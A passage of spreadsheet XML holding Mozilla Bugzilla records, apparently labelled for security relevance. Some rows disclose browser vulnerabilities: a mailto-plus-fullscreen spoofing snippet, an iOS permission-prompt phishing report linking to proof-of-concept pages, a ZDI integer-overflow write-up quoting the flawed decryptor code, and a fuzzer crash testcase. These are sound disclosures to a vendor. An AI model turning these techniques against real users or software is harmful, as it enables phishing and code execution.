Last Time I Have Reported Same Type of Bug Using Malito to Hide Full Screen Popup Ui but It Is Closed Due to Duplicate 
But This Time I Came with New Vulnerability Now We Can Hide Full Screen Popup Ui
Using Malito: + setTimeout Function Using Js In Firefox Browser in Windows
1. I Have Created HTML Page
2. And I Have Added a Button &amp; Two Functions in One Button
One Function to Open Mailto: Link
Second Function ::
function PufWin() {
 setTimeout(function () {
document.documentElement.requestFullscreen();
  }, 100);
Now Let's Click On [Button] 
Actual results:
First It Will Open Mailto Link Outlook Application and Then It Will Go to Full Screen Mode in Background Without Knowing User/Victim
Expected results:
It Should Prevent/Stop Mailto: Link on the Time of Full Screen Mode</t>
        </is>
      </c>
      <c r="X1564" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1565">
      <c r="A1565" t="n">
        <v>1112407</v>
      </c>
      <c r="B1565" t="inlineStr">
        <is>
          <t>2014-12-16 17:20:51 -0800</t>
        </is>
      </c>
      <c r="C1565" t="inlineStr">
        <is>
          <t>Remove the "Revision URL List" feature since it doesn't display all changesets</t>
        </is>
      </c>
      <c r="D1565" t="inlineStr">
        <is>
          <t>2015-11-26 08:56:15 -0800</t>
        </is>
      </c>
      <c r="E1565" t="n">
        <v>1</v>
      </c>
      <c r="F1565" t="n">
        <v>1</v>
      </c>
      <c r="G1565" t="n">
        <v>7</v>
      </c>
      <c r="H1565" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1565" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1565" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K1565" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1565" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1565" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1565" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1565" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1565" t="inlineStr"/>
      <c r="Q1565" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1565" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1565" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1565" t="n">
        <v>1</v>
      </c>
      <c r="U1565" t="n">
        <v>0</v>
      </c>
      <c r="V1565" t="n">
        <v>16</v>
      </c>
      <c r="W1565" t="inlineStr">
        <is>
          <t>So there's a push to mozilla-central that lists 20 revisions, and also has the "... and 73 more" link that links to the full list of revisions for that push: https://treeherder.mozilla.org/ui/#/jobs?repo=mozilla-central&amp;revision=b7eb1ce0237d
If I click the middle button for that push (to open the menu of other options like mcMerge, self-serve, and Revision URL List, then I click the Revision URL List option, a window pops up with the URLs to each revision in the push.
This is all great, but if you look in that pop up window, only the 20 revisions shown in Treeherder's UI are listed in the popup. The other 73 revisions are nowhere to be seen.
Bummer, man.</t>
        </is>
      </c>
      <c r="X1565" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1566">
      <c r="A1566" t="n">
        <v>966630</v>
      </c>
      <c r="B1566" t="inlineStr">
        <is>
          <t>2014-02-01 05:02:41 -0800</t>
        </is>
      </c>
      <c r="C1566" t="inlineStr">
        <is>
          <t>WebGL crash [@mozilla::gl::GLContext::fCompressedTexImage2D / gleEvaluateTextureImageChange]</t>
        </is>
      </c>
      <c r="D1566" t="inlineStr">
        <is>
          <t>2015-08-30 12:01:04 -0700</t>
        </is>
      </c>
      <c r="E1566" t="n">
        <v>1</v>
      </c>
      <c r="F1566" t="n">
        <v>1</v>
      </c>
      <c r="G1566" t="n">
        <v>3</v>
      </c>
      <c r="H1566" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1566" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1566" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K1566" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1566" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1566" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1566" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1566" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1566" t="inlineStr">
        <is>
          <t>[adv-main29+][adv-esr24.5+]</t>
        </is>
      </c>
      <c r="Q1566" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1566" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1566" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T1566" t="n">
        <v>1</v>
      </c>
      <c r="U1566" t="n">
        <v>0</v>
      </c>
      <c r="V1566" t="n">
        <v>32</v>
      </c>
      <c r="W1566" t="inlineStr">
        <is>
          <t>Created attachment 8369063
testcase
Tested with http://hg.mozilla.org/integration/mozilla-inbound/rev/1e7b2bb3041b</t>
        </is>
      </c>
      <c r="X1566" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1567">
      <c r="A1567" t="n">
        <v>867065</v>
      </c>
      <c r="B1567" t="inlineStr">
        <is>
          <t>2013-04-30 01:47:32 -0700</t>
        </is>
      </c>
      <c r="C1567" t="inlineStr">
        <is>
          <t>DuT doesn't play "busy line" tone</t>
        </is>
      </c>
      <c r="D1567" t="inlineStr">
        <is>
          <t>2013-06-05 03:16:42 -0700</t>
        </is>
      </c>
      <c r="E1567" t="n">
        <v>1</v>
      </c>
      <c r="F1567" t="n">
        <v>1</v>
      </c>
      <c r="G1567" t="n">
        <v>6</v>
      </c>
      <c r="H1567" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1567" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J1567" t="inlineStr">
        <is>
          <t>Gaia::Dialer</t>
        </is>
      </c>
      <c r="K1567" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1567" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M1567" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N1567" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1567" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1567" t="inlineStr">
        <is>
          <t>IOT, POVB,COM_RIL</t>
        </is>
      </c>
      <c r="Q1567" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1567" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1567" t="inlineStr">
        <is>
          <t>1.0.1 Cert2 (21may)</t>
        </is>
      </c>
      <c r="T1567" t="n">
        <v>1</v>
      </c>
      <c r="U1567" t="n">
        <v>0</v>
      </c>
      <c r="V1567" t="n">
        <v>13</v>
      </c>
      <c r="W1567" t="inlineStr">
        <is>
          <t>----------------
  device: Ikura
  build ID:20130426165700
  build information:
  gaia commit:
  e25b349 Merge pull request #9273 from gasolin/issue-863126
  gecko commit:
  6dfd179 Bug 849757 - Part 4: xpcshell tests. r=vicamo, a=tef+
  AU:V1.01.00.01.019.085
----------------
When calling to a busy line, DuT doesn't play "busy line" tone. It just finishes the call and goes back to previous screen (call log, contact...). Same occured when rejecting call in the other side.
- Steps to Reproduce:
1.- Call to a busy line --&gt; check the tones
2.- Call to a phone number and reject the call --&gt; check the tones
- Actual Result:
DuT doesn't play "busy line" tone
- Expected Result (correct behaviour wished):
It must play the corresponding tone 
This issue was long ago reported in bug 857951, and according to it, the patch to solve it was already updlifted to both v1.0.1 and v1-train. However, I'm still reproducing this issue
Nominating to tef?</t>
        </is>
      </c>
      <c r="X1567" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1568">
      <c r="A1568" t="n">
        <v>489647</v>
      </c>
      <c r="B1568" t="inlineStr">
        <is>
          <t>2009-04-22 13:06:09 -0700</t>
        </is>
      </c>
      <c r="C1568" t="inlineStr">
        <is>
          <t>New 1.9.0.9 topcrash [@nsTextFrame::ClearTextRun()]</t>
        </is>
      </c>
      <c r="D1568" t="inlineStr">
        <is>
          <t>2017-03-14 17:21:58 -0700</t>
        </is>
      </c>
      <c r="E1568" t="n">
        <v>1</v>
      </c>
      <c r="F1568" t="n">
        <v>1</v>
      </c>
      <c r="G1568" t="n">
        <v>3</v>
      </c>
      <c r="H1568" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1568" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1568" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1568" t="inlineStr">
        <is>
          <t>1.9.0 Branch</t>
        </is>
      </c>
      <c r="L1568" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1568" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1568" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1568" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1568" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1568" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1568" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1568" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1568" t="n">
        <v>1</v>
      </c>
      <c r="U1568" t="n">
        <v>0</v>
      </c>
      <c r="V1568" t="n">
        <v>43</v>
      </c>
      <c r="W1568" t="inlineStr">
        <is>
          <t>Firefox 3.0.9 has exposed a new topcrash @nsTextFrame::ClearTextRun(). One instance is bug 489322, involving the HTML Validator addon. We'll see soon if that's the only case because the author of that addon is about to release an update with a workaround (disables the crashing feature).
Filing separate to track as a security bug.
Crashes:
http://crash-stats.mozilla.com/report/list?product=Firefox&amp;version=Firefox%3A3.0.9&amp;query_search=signature&amp;query_type=exact&amp;query=&amp;date=&amp;range_value=1&amp;range_unit=weeks&amp;do_query=1&amp;signature=nsTextFrame%3A%3AClearTextRun()
This appears to be exploitable given random addresses at the top of the stack
bp-e5e76111-98f2-4785-9fe6-ba0582090421
bp-49a91d2b-b49c-4316-957e-d2c9b2090421
bp-87a98e87-4982-488f-8c11-6a2c72090421
bp-043a79b6-250a-4d52-8862-ef1d72090421
etc.
Here's one with a comment that does NOT mention view source -- this one says they did a ctrl-f (find) and clicked the "Highlight All" button.
bp-d31d7a90-09b4-4cf5-9baf-7b1952090422</t>
        </is>
      </c>
      <c r="X1568" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1569">
      <c r="A1569" t="n">
        <v>1786934</v>
      </c>
      <c r="B1569" t="inlineStr">
        <is>
          <t>2022-08-24 11:42:18 -0700</t>
        </is>
      </c>
      <c r="C1569" t="inlineStr">
        <is>
          <t>In Firefox on iOS, the permission request prompt from the site in the background tab is overlaid on top of the site in the foreground tab.</t>
        </is>
      </c>
      <c r="D1569" t="inlineStr">
        <is>
          <t>2024-09-16 00:03:23 -0700</t>
        </is>
      </c>
      <c r="E1569" t="n">
        <v>1</v>
      </c>
      <c r="F1569" t="n">
        <v>1</v>
      </c>
      <c r="G1569" t="n">
        <v>2</v>
      </c>
      <c r="H1569" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1569" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J1569" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1569" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1569" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M1569" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N1569" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1569" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1569" t="inlineStr"/>
      <c r="Q1569" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1569" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1569" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1569" t="n">
        <v>1</v>
      </c>
      <c r="U1569" t="n">
        <v>0</v>
      </c>
      <c r="V1569" t="n">
        <v>22</v>
      </c>
      <c r="W1569" t="inlineStr">
        <is>
          <t>Originated from bug report https://bugzilla.mozilla.org/show_bug.cgi?id=1784741
### Vulnerabilities related to T6
T6-1 : In Firefox on iOS, the permission request prompt from the site in the background tab is overlaid on top of the site in the foreground tab. The permission types in which this vulnerability exists are shown in Table VIII. This vulnerability realizes the Permission-based Phishing Attack shown below. This vulnerability can be exploited in a serious attack that threatens user privacy.
### Permission-based Phishing Attack
In a Permission-based Phishing Attack, an attacker compels the target to mistakenly grant access to a resource by presenting a fake permission request. For details on this attack, refer to Sections V-B and VI-B of our paper.
Proof-of-concept Code
We share a proof-of-concept code for overlay of permission request prompts.
https://drive.google.com/drive/folders/1OCA3qSmx-lB-pQB30ky62Xmoi_2BYV4z?usp=sharing
You can try the overlay of the permission request prompt by installing this PoC code on a server on an HTTPS domain.
In particular, open index.html, click on the "Open a New Tab" link, and wait for about 20 seconds.
Then you will see a permission request prompt from the domain where index.html is located on the site "example.com" which is opened in a new tab.
We also prepared a website with PoC installed on our server.
https://pocforshare.com/77cxk/index.html</t>
        </is>
      </c>
      <c r="X1569" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1570">
      <c r="A1570" t="n">
        <v>567642</v>
      </c>
      <c r="B1570" t="inlineStr">
        <is>
          <t>2010-05-23 06:02:48 -0700</t>
        </is>
      </c>
      <c r="C1570" t="inlineStr">
        <is>
          <t>Need to update "Using the SDK with XUL extensions" (harness service contract ID is different in cfx run and cfx xpi)</t>
        </is>
      </c>
      <c r="D1570" t="inlineStr">
        <is>
          <t>2012-06-24 13:08:44 -0700</t>
        </is>
      </c>
      <c r="E1570" t="n">
        <v>1</v>
      </c>
      <c r="F1570" t="n">
        <v>1</v>
      </c>
      <c r="G1570" t="n">
        <v>6</v>
      </c>
      <c r="H1570" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1570" t="inlineStr">
        <is>
          <t>Add-on SDK Graveyard</t>
        </is>
      </c>
      <c r="J1570" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1570" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1570" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1570" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1570" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1570" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1570" t="inlineStr"/>
      <c r="Q1570" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1570" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1570" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1570" t="n">
        <v>1</v>
      </c>
      <c r="U1570" t="n">
        <v>0</v>
      </c>
      <c r="V1570" t="n">
        <v>15</v>
      </c>
      <c r="W1570" t="inlineStr">
        <is>
          <t>To use Jetpack SDK with regular extensions &lt;https://jetpack.mozillalabs.com/sdk/latest/docs/#guide/xul-extensions&gt; it's important to be able to access the jetpack loader functionality from code not yet in jetpack modules.
It used to be possible to do that by accessing the harness service by contract id "@mozilla.org/harness-service;1?id=test@example.com", where test@example.com was the id in package.json.
I just updated to the current tip and apparently the id of the harness service is now hardcoded when using 'cfx run':
http://hg.mozilla.org/labs/jetpack-sdk/diff/20cce16d1041/python-lib/cuddlefish/__init__.py
https://bugzilla.mozilla.org/show_bug.cgi?id=566812
Why? How should the XUL extensions doc be updated?
This should block 0.4, unless I'm missing something obvious.</t>
        </is>
      </c>
      <c r="X1570" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1571">
      <c r="A1571" t="n">
        <v>364161</v>
      </c>
      <c r="B1571" t="inlineStr">
        <is>
          <t>2006-12-17 13:01:06 -0800</t>
        </is>
      </c>
      <c r="C1571" t="inlineStr">
        <is>
          <t>Inefficient SQL: Selecting subclass from setting table</t>
        </is>
      </c>
      <c r="D1571" t="inlineStr">
        <is>
          <t>2008-09-08 08:47:05 -0700</t>
        </is>
      </c>
      <c r="E1571" t="n">
        <v>1</v>
      </c>
      <c r="F1571" t="n">
        <v>1</v>
      </c>
      <c r="G1571" t="n">
        <v>4</v>
      </c>
      <c r="H1571" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1571" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1571" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K1571" t="inlineStr">
        <is>
          <t>2.23.3</t>
        </is>
      </c>
      <c r="L1571" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1571" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1571" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1571" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1571" t="inlineStr"/>
      <c r="Q1571" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1571" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1571" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T1571" t="n">
        <v>1</v>
      </c>
      <c r="U1571" t="n">
        <v>0</v>
      </c>
      <c r="V1571" t="n">
        <v>8</v>
      </c>
      <c r="W1571" t="inlineStr">
        <is>
          <t>The following SQL is called during a page load. Selecting the subclass should be done by the SQL called just before it.
SELECT name, default_value, is_enabled FROM setting ORDER BY name
SELECT subclass FROM setting WHERE name = 'comment_sort_order'
SELECT subclass FROM setting WHERE name = 'csv_colsepchar'
SELECT subclass FROM setting WHERE name = 'display_quips'
SELECT subclass FROM setting WHERE name = 'per_bug_queries'
SELECT subclass FROM setting WHERE name = 'post_bug_submit_action'
SELECT subclass FROM setting WHERE name = 'skin'
SELECT subclass FROM setting WHERE name = 'state_addselfcc'
SELECT subclass FROM setting WHERE name = 'zoom_textareas'
Above 8 queries are avoidable.
For the whole SQL log, please see attachment 248929.</t>
        </is>
      </c>
      <c r="X1571" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1572">
      <c r="A1572" t="n">
        <v>1346648</v>
      </c>
      <c r="B1572" t="inlineStr">
        <is>
          <t>2017-03-12 12:15:15 -0700</t>
        </is>
      </c>
      <c r="C1572" t="inlineStr">
        <is>
          <t>ClearKeyDecryptor Integer Overflow Remote (ZDI-CAN-4535)</t>
        </is>
      </c>
      <c r="D1572" t="inlineStr">
        <is>
          <t>2017-10-26 19:13:26 -0700</t>
        </is>
      </c>
      <c r="E1572" t="n">
        <v>1</v>
      </c>
      <c r="F1572" t="n">
        <v>1</v>
      </c>
      <c r="G1572" t="n">
        <v>3</v>
      </c>
      <c r="H1572" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1572" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1572" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K1572" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1572" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1572" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1572" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1572" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1572" t="inlineStr">
        <is>
          <t>[Disclosure deadline: end of June][adv-main53+][adv-esr45.9+][adv-esr52.1+]</t>
        </is>
      </c>
      <c r="Q1572" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1572" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1572" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T1572" t="n">
        <v>1</v>
      </c>
      <c r="U1572" t="n">
        <v>0</v>
      </c>
      <c r="V1572" t="n">
        <v>48</v>
      </c>
      <c r="W1572" t="inlineStr">
        <is>
          <t>Created attachment 8846430
zipped POC (password is ZDI-CAN-4535)
We received the following report from Trending Micro's Zero Day
Initiative (ZDI):
ZDI-CAN-4535: Mozilla Firefox ClearKeyDecryptor Integer Overflow Remote
Code Execution Vulnerability
-- CVSS -----------------------------------------
5.1, AV:N/AC:H/Au:N/C:P/I:P/A:P
-- VULNERABILITY DETAILS ------------------------
* Version Tested: Firefox Nightly, changeset 341105:e677ba018b22, and
general release Firefox 51.0.1 (32-bit)
* Platform Tested: Windows 10 Enterprise 14393.693
This is a failed patch of the vulnerability we originally reported to
you as ZDI-CAN-3766 in May 2016.
The malicious value is found at offset +0x555 from the start of video1.m4s.
Relevant source code (from
mozilla-central\media\gmp-clearkey\0.1\clearkeydecryptionmanager.cpp):
```
Status
ClearKeyDecryptor::Decrypt(uint8_t* aBuffer, uint32_t aBufferSize,
                           const CryptoMetaData&amp; aMetadata)
{
  CK_LOGD("ClearKeyDecryptor::Decrypt");
  // If the sample is split up into multiple encrypted subsamples, we
need to
  // stitch them into one continuous buffer for decryption.
  std::vector&lt;uint8_t&gt; tmp(aBufferSize);
  if (aMetadata.NumSubsamples()) {
    // Take all encrypted parts of subsamples and stitch them into one
    // continuous encrypted buffer.
    uint8_t* data = aBuffer;
    uint8_t* iter = &amp;tmp[0];
    for (size_t i = 0; i &lt; aMetadata.NumSubsamples(); i++) {
      data += aMetadata.mClearBytes[i];
      uint32_t cipherBytes = aMetadata.mCipherBytes[i];
      if (data + cipherBytes &gt; aBuffer + aBufferSize) {
   &lt;==== Integer addition data + cipherBytes may wrap around,
        // Trying to read past the end of the buffer!
                   bypassing the check
        return Status::kDecryptError;
      }
      memcpy(iter, data, cipherBytes);
          &lt;==== BANG
```
[--- snipped debug log, moved to attachment ---]
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
   Anonymous working with Trend Micro's Zero Day Initiative</t>
        </is>
      </c>
      <c r="X1572" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1573">
      <c r="A1573" t="n">
        <v>996715</v>
      </c>
      <c r="B1573" t="inlineStr">
        <is>
          <t>2014-04-15 10:23:10 -0700</t>
        </is>
      </c>
      <c r="C1573" t="inlineStr">
        <is>
          <t>Crash [@ compartment] with invalid object pointer</t>
        </is>
      </c>
      <c r="D1573" t="inlineStr">
        <is>
          <t>2015-08-30 12:12:05 -0700</t>
        </is>
      </c>
      <c r="E1573" t="n">
        <v>1</v>
      </c>
      <c r="F1573" t="n">
        <v>1</v>
      </c>
      <c r="G1573" t="n">
        <v>3</v>
      </c>
      <c r="H1573" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1573" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1573" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1573" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1573" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M1573" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1573" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1573" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1573" t="inlineStr">
        <is>
          <t>[adv-main30+][adv-esr24.6+]</t>
        </is>
      </c>
      <c r="Q1573" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1573" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1573" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T1573" t="n">
        <v>1</v>
      </c>
      <c r="U1573" t="n">
        <v>0</v>
      </c>
      <c r="V1573" t="n">
        <v>30</v>
      </c>
      <c r="W1573" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 1f932e462b84 (x86 ARM simulator build, run with --fuzzing-safe):
function g(e,a) {
    return Math.abs(a - e) &lt;= 1E-10;
}
function w(s) {}
eval("(function() { " + "\
var FOUR_HUNDRED_YEARS = (0);\
var SECTION         =  (0);\
w(\"15.9.1.1 Time Range\");\
for ( var M_SECS = 0, CURRENT_YEAR = 1970; M_SECS &lt; 8640000000000000; M_SECS += FOUR_HUNDRED_YEARS, CURRENT_YEAR += 400) {\
  g(SECTION,  '%' + (new String('1') % undefined), (new Date(M_SECS)).getUTCFullYear());\
}\
test();\
" + " })();");</t>
        </is>
      </c>
      <c r="X1573" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1574">
      <c r="A1574" t="n">
        <v>626020</v>
      </c>
      <c r="B1574" t="inlineStr">
        <is>
          <t>2011-01-15 00:55:20 -0800</t>
        </is>
      </c>
      <c r="C1574" t="inlineStr">
        <is>
          <t>Production Socorro Monitor not able to connect to HBase</t>
        </is>
      </c>
      <c r="D1574" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E1574" t="n">
        <v>1</v>
      </c>
      <c r="F1574" t="n">
        <v>1</v>
      </c>
      <c r="G1574" t="n">
        <v>4</v>
      </c>
      <c r="H1574" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1574" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1574" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1574" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1574" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1574" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1574" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1574" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1574" t="inlineStr"/>
      <c r="Q1574" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1574" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1574" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1574" t="n">
        <v>1</v>
      </c>
      <c r="U1574" t="n">
        <v>0</v>
      </c>
      <c r="V1574" t="n">
        <v>3</v>
      </c>
      <c r="W1574" t="inlineStr">
        <is>
          <t>Monitor in MPT is not able to connect to HBase following the recent outage (bug 626007). Tried restarting. Here is a traceback:
    2011-01-15 00:05:14,792 DEBUG - MainThread - creating crashStorePool
    2011-01-15 00:05:14,792 INFO - priorityLoopingThread - priorityJobAllocationLoop starting.
    2011-01-15 00:05:14,792 INFO - jobCleanupThread - jobCleanupLoop starting.
    2011-01-15 00:05:14,792 INFO - jobCleanupThread - beginning jobCleanupLoop cycle.
    2011-01-15 00:05:14,793 DEBUG - jobCleanupThread - dealing with completed and failed jobs
    2011-01-15 00:05:14,793 DEBUG - MainThread - creating crashStore for MainThread
    2011-01-15 00:05:14,793 INFO - connecting to hbase
    2011-01-15 00:05:14,793 DEBUG - make_connection, timeout = 5000
    2011-01-15 00:05:14,796 DEBUG - connection successful
    2011-01-15 00:05:14,801 DEBUG - priorityLoopingThread - sleeping
    2011-01-15 00:05:14,803 DEBUG - jobCleanupThread - starting deletion
    2011-01-15 00:05:14,804 INFO - MainThread - looking for dead processors
    2011-01-15 00:05:14,804 INFO - MainThread - threshold 0:15:00
    2011-01-15 00:05:14,808 DEBUG - jobCleanupThread - end of this cleanup iteration
    2011-01-15 00:05:14,810 INFO - MainThread - dead processors: []
    2011-01-15 00:05:14,810 DEBUG - MainThread - getting jobSchedulerIter
    2011-01-15 00:05:14,810 DEBUG - MainThread - beginning index scan
    2011-01-15 00:05:14,810 DEBUG - MainThread - starting destructiveDateWalk
    2011-01-15 00:05:14,810 DEBUG - MainThread - retry_wrapper_for_generators: trying first time, iterator_for_all_legacy_to_be_processed
    2011-01-15 00:05:14,810 DEBUG - iterator_for_all_legacy_to_be_processed
    2011-01-15 00:05:14,810 DEBUG - limit = 1000000
    2011-01-15 00:05:14,859 DEBUG - Scanner 0 generated
    2011-01-15 00:05:17,805 DEBUG - Scanner 1 generated
    2011-01-15 00:05:20,481 DEBUG - Scanner 2 generated
    2011-01-15 00:05:23,057 DEBUG - Scanner 3 generated
    2011-01-15 00:05:25,853 DEBUG - Scanner 4 generated
    2011-01-15 00:05:30,852 DEBUG - MainThread - retry_wrapper_for_generators: handled exception, threading.currentThread().getName(), timed out
    2011-01-15 00:05:30,852 DEBUG - MainThread - retry_wrapper_for_generators: about to retry connection
